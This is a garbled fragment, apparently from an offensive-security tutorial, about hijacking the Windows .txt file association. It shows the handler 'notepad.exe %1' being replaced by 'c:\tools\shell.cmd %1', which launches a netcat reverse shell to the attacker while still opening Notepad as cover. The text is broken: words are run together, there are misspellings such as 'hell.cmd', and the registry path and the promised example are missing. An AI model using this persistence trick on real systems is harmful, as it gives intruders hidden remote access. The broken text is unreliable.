.txtextension (among many others) are mapped to applictions that can open those files in Windows registry located at
notepad.exe %1, where
%1is the argument for notepad.exe, which specifies a file name the notepad should open:
c:\tools\hell.cmdwill launch a simple netcat reverse shell to the attacking system and also a notepad with the
test.txtfile as an argument.
c:\tools\shell.cmd %1as shown below: